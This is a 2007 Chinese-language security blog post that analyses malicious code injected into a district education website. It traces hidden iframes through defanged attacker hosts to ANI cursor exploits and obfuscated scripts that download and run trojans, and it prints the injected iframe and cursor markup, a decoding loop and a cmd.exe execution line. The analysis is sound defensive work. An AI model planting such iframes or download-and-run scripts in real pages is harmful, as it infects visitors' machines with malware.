某市河西區教育資訊網升級為曆代掛馬技術展示平台

endurer 原創

2007-05-15 第1版

此前普發現此網被加入傳播Worm.Win32.Viking.jr等的代碼，可參考：

某市河西區教育資訊網被加入傳播Worm.Win32.Viking.jr等的代碼
http://endurer.bokee.com/6186405.html
http://blog.csdn.net/Purpleendurer/archive/2007/03/26/1542040.aspx
http://blog.sina.com.cn/u/49926d910100082w

剛才去轉了一下，發現那裡已“升級”成了曆代掛馬技術展示平台，從加入多餘空格、用escape()加密等簡單方法，到US-ASCII、ANI漏洞，一應俱全。

在首頁末發現代碼：
/---
＜iframe src＝"hxxp://w***.q**b*b**d.com/bd***.htm?001" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.m***m*ju.net/bbs/tj***.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞ ＜iframe src＝"hxxp://idc**.ki*s***163.com/index.html?id＝hagk" width＝"0" height＝"0"＞＜/iframe＞
＜iframe src＝hxxp://www.hao123***hao123*.cn/ok***/index.htm width＝0 height＝0＞＜/iframe＞＜iframe src＝hxxp://www.x**4*5*4**.cn/ width＝100 height＝0 frameborder＝0＞＜/iframe＞＜iframe src＝hxxp://www.x**4*5*4**.cn/ width＝100 height＝0 frameborder＝0＞＜/iframe＞＜iframe src＝hxxp://www.x**4*5*4**.cn/ width＝100 height＝0 frameborder＝0＞＜/iframe＞
＜iframe src＝hxxp://qq***.h*1***48.cn/ width＝100 height＝0 frameborder＝0＞＜/iframe＞
---/

hxxp://w***.q**b*b**d.com/bd***.htm?001 包含代碼：
/---
＜BODY style＝'CURSOR: url(hxxp://s***.g*c***uj.com/t.js)'＞

＜iframe src＝"hxxp://s***.g*c***uj.com/1.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

t.js 利用 ANI 漏洞 下載 0.exe

檔案說明符 : D:/test/0.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-5-15 12:55:0
修改時間 : 2007-5-15 12:55:52
訪問時間 : 2007-5-15 12:56:53
大小 : 36864 位元組 36.0 KB
MD5 : 03e68c72bb560cd19711afdebd63c73c

Kaspersky 報為 Worm.Win32.Delf.bs

hxxp://s***.g*c***uj.com/1.htm的內容為 Javascript 代碼，功能是用unescape() 解出 變數 Words 的值並輸出。

解出的Words 值為 VBScript 代碼，功能是利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下載檔案 0.exe， 儲存為 IE臨時檔案夾中的 install.com，並利用Shell.Application 對象 Q 的 ShellExecute 方法 來運行。

hxxp://s***.g*c***uj.com/bd.htm?001 的內容與hxxp://w***.q**b*b**d.com/bd***.htm?001相同。

hxxp://idc**.ki*s***163.com/index.html?id＝hagk 包含代碼：
/---
＜script src＝css.js＞＜/script＞
---/

hxxp://idc**.ki*s***163.com/css.js 內容為JavaScript指令碼代碼，功能為用自訂函數解密代碼並通過 eval() 來運行。

解密後的內容為JavaScript指令碼代碼，功能為是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下載檔案 hxxp://bo*ol***o*m.com/love.exe， 就是 昨天

小心免費送6位QQ號碼的網站傳播Worm.Win32.Viking.lj/Worm.Viking.sv
http://endurer.bokee.com/6274049.html
http://blog.csdn.net/Purpleendurer/archive/2007/05/14/1608238.aspx
http://blog.sina.com.cn/u/49926d91010008pd

中的那個。

hxxp://www.hao123***hao123*.cn/ok***/index.htm 包含代碼：
/---
＜iframe src＝"hxxp://www.hao123***hao123*.cn/bbs/1881.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://www.hao123***hao123*.cn/bbs/1881.htm  包含代碼：
/---
＜iframe src＝"hxxp://www.f*z***zv.com/sousuo.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.955***92**2.cn/web.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.hao123***hao123*.cn/" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.i***p**5*28.cn/" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://www.f*z***zv.com/sousuo.htm 包含代碼：
/---
＜iframe src＝"hxxp://s***.g*c***uj.com/bd.htm?268001" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://s***.g*c***uj.com/bd.htm?268001內容與hxxp://w***.q**b*b**d.com/bd***.htm?001相同。

hxxp://www.955***92**2.cn/web.htm 包含代碼：
/---
＜iframe src＝hxxp://www.1****8d**m*m***.com/dm/kehu0738.htm width＝0 height＝0＞＜/iframe＞
---/

hxxp://www.1****8d**m*m***.com/dm/kehu0738.htm 的包含使用是US-ASCII編碼的字串。到http://purpleendurer.ys168.com 下載 US-ASCII加密、解密程式 進行解密，得到的內容為：
/---
＜HTML＞
＜BODY＞
＜DIV id＝new_content_jp style＝"DISPLAY: none"＞
＜DIV style＝"CURSOR: url('hxxp://1****8d**m*m***.com/arp/1.jpg')"＞
＜DIV style＝"CURSOR: url('hxxp://1****8d**m*m***.com/arp/2.jpg')"＞＜/DIV＞＜/DIV＞＜/DIV＞
＜SCRIPT language＝javascript src＝"hxxp://1****8d**m*m***.com/arp/run.js"＞＜/SCRIPT＞
＜/BODY＞
＜iframe src＝hxxp://www.1****8d**m*m***.com/arp/0614.htm width＝0 height＝0＞＜/iframe＞
＜/HTML＞  
---/

1.jpg 和 2.jpg 利用 ANI 漏洞下載 down.exe

檔案說明符 : D:/test/down.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-5-15 13:15:51
修改時間 : 2007-5-15 13:17:39
訪問時間 : 2007-5-15 13:18:17
大小 : 18944 位元組 18.512 KB
MD5 : c23c3fabe68fdadd14a89bf111f8bf2e

Kaspersky 報為 Trojan-Downloader.Win32.Delf.bko

hxxp://1****8d**m*m***.com/arp/run.js 的功能是檢測瀏覽器種類和版本，並輸出 顯示 1.jpg 和 2.jpg 的代碼。

hxxp://www.1****8d**m*m***.com/arp/0614.htm 包含 JavaScript 和 VBScript 代碼，使用代碼
/---
DO WHILE LEN(S)＞1
    k＝"&H"+ucase(LEFT(S,2))
    p＝CLng(k)
    m＝chr(p)
    D＝D&m
    S＝mymid(S)
LOOP
---/
解密變數 S 的值，按照變數 flag_type 的值，以VBScript、JavaScript 或 HTML的形式輸出。這裡flag_type 的 值 為 "vbs"，所以輸出的是 VBScript 代碼，功能是 利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下載檔案 down.exe，儲存到IE臨時檔案夾中，建立 down.vbs，並利用Shell.Application 對象 Q 的 ShellExecute 方法 來運行。

hxxp://www.hao123***hao123*.cn/ 包含代碼：
/---
＜iframe src＝hxxp://www.s*en***love.com/a**/2.htm width＝50 height＝0＞＜/iframe＞
---/

hxxp://www.s*en***love.com/a**/2.htm 包含代碼：
/---
＜DIV style＝"CURSOR: url('hxxp://www.s*en***love.com/a**/a.jpg')"＞
＜DIV style＝"CURSOR: url('hxxp://www.s*en***love.com/a**/b.jpg')"＞＜/DIV＞＜/DIV＞＜/BODY＞＜/HTML＞
＜iframe src＝v1.htm width＝0 height＝0＞＜/iframe＞
---/
a.jpg 和 b.jpg 利用 ANI 漏洞下載 hxxp://www.s*en***love.com/a**/2.exe

檔案說明符 : D:/test/2.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-5-15 13:23:35
修改時間 : 2007-5-15 13:24:28
訪問時間 : 2007-5-15 13:25:1
大小 : 23030 位元組 22.502 KB
MD5 : b43b5493549c4f7658850bdbe41e8c4f

Kaspersky 報為 Trojan-PSW.Win32.Delf.qc

hxxp://www.s*en***love.com/a**/v1.htm 包含代碼：
/---
＜script src＝1.js＞＜/script＞
---/

1.js打不開，可能已不存在。

hxxp://www.i***p**5*28.cn/ 包含代碼：
/---
＜iframe src＝hxxp://www.08***3***25.cn/wm/xin4***.htm?110 width＝0 height＝0＞＜/iframe＞
---/

hxxp://www.08***3***25.cn/wm/xin4***.htm?110 包含代碼：
/---
＜BODY style＝'CURSOR: url(hxxp://www.08***3***25.cn/wm/d.jpg)'＞＜/BODY＞
＜/HTML＞
＜script src＝hxxp://www.08***3***25.cn/wm/0614.js＞＜/script＞
---/

d.jpg 利用 ANI 漏洞下載 hxxp://www.08***3***25.cn/wm/down.exe

檔案說明符 : D:/test/down.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-5-15 13:42:49
修改時間 : 2007-5-15 13:43:54
訪問時間 : 2007-5-15 13:44:42
大小 : 16619 位元組 16.235 KB
MD5 : a961822d4e5d96a4f2e58be91f83a450

Kaspersky 報為 Trojan-Downloader.Win32.Delf.bko 和 Worm.Win32.Delf.bs

hxxp://www.08***3***25.cn/wm/0614.js的內容為JavaScript指令碼代碼，功能為用自訂函數解密代碼並通過 eval() 來運行。

經過2次解密後的內容為JavaScript指令碼代碼，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下載檔案 down.exe，儲存到%windir%，檔案名稱由自訂函數：
/---
function gn（n）｛ var number ＝ Math.random（）＊n； return ‘~tmp’＋‘.tmp’；｝
---/
產生，即~tmp.tmp，然後通過 Shell.Application 對象 Q 的 ShellExecute 方法執行命令： %windir%/system32/cmd.exe /c %windir%/~tmp.tmp 來運行。

hxxp://www.x**4*5*4**.cn/ 包含代碼：
/---
＜iframe src＝"hxxp://qq.5**20s**f.org/4*1**/index.htm" width＝"100" height＝"0"＞ ＜/iframe＞
＜iframe src＝hxxp://qq.5**20s**f.org/4*1**/06014.htm width＝0 height＝0＞＜/iframe＞
＜iframe src＝"hxxp://www.5**4*6***0w.cn/index.htm" width＝"100" height＝"0"＞ ＜/iframe＞
＜iframe src＝"hxxp://www.m***hk***j52**0.com/index.htm" width＝"100" height＝"0"＞ ＜/iframe＞
---/

hxxp://qq.5**20s**f.org/4*1**/index.htm 包含代碼：
/---
＜script src＝"hxxp://qq.5**20s**f.org/4*1**/xjz2007.js"＞＜/script＞
---/

hxxp://qq.5**20s**f.org/4*1**/xjz2007.js 包含代碼：
/---
document.writeln("＜iframe src＝xjz2007.htm width＝0 height＝0 frameborder＝0＞＜//iframe＞");
document.writeln("＜DIV style＝/"CURSOR: url(/'xjz2007.bmp/')/"＞");
document.writeln("＜//DIV＞＜//BODY＞＜//HTML＞")
---/

hxxp://qq.5**20s**f.org/4*1**/xjz2007.htm 包含VBScript代碼，不過不用解密，因為變數xinchunkuaile 值已經展示下載的檔案是 6xz.exe。

檔案說明符 : D:/test/6xz.exe
屬性 : A---
擷取檔案版本資訊大小失敗!
建立時間 : 2007-5-15 13:45:1
修改時間 : 2007-5-15 13:45:1
訪問時間 : 2007-5-15 13:45:23
大小 : 22528 位元組 22.0 KB
MD5 : 410da0576768619b234adbda5ba06bc5

Kaspersky 報為 Downloader.Win32.Small.eor

xjz2007.bmp  利用 ANI 漏洞下載 6xz.exe

hxxp://qq.5**20s**f.org/4*1**/06014.htm　的內容加入有許多空格，所含javaScript代碼的功能是其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下載6xz.exe，儲存為ie.exe，建立 ie.vbs，並利用Shell.Application 對象 Q 的 ShellExecute 方法 來運行。
其中還包含一個自訂函數Exploit（）。

hxxp://www.5**4*6***0w.cn/index.htm　包含代碼：
/---
＜iframe src＝"hxxp://www.p***um**a163**.com/p***u/709671697.htm?56" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
s"＞＜/script＞
---/

hxxp://www.p***um**a163**.com/p***u/709671697.htm?56　包含代碼：
/---
＜script src＝614.js＞＜/script＞
---/

hxxp://www.p***um**a163**.com/p***u/614.js的內容與

小心免費送6位QQ號碼的網站傳播Worm.Win32.Viking.lj/Worm.Viking.sv
http://endurer.bokee.com/6274049.html
http://blog.csdn.net/Purpleendurer/archive/2007/05/14/1608238.aspx
http://blog.sina.com.cn/u/49926d91010008pd

中的相同，下載 pu.exe。

hxxp://www.m***hk***j52**0.com/index.htm　包含代碼：
/---
＜iframe src＝hxxp://www.08***3***25.cn/wm/xin16.htm width＝0 height＝0＞＜/iframe＞
---/

hxxp://www.08***3***25.cn/wm/xin16.htm 內容與 hxxp://www.08***3***25.cn/wm/xin4***.htm?110相同。

hxxp://qq***.h*1***48.cn/ 打不開。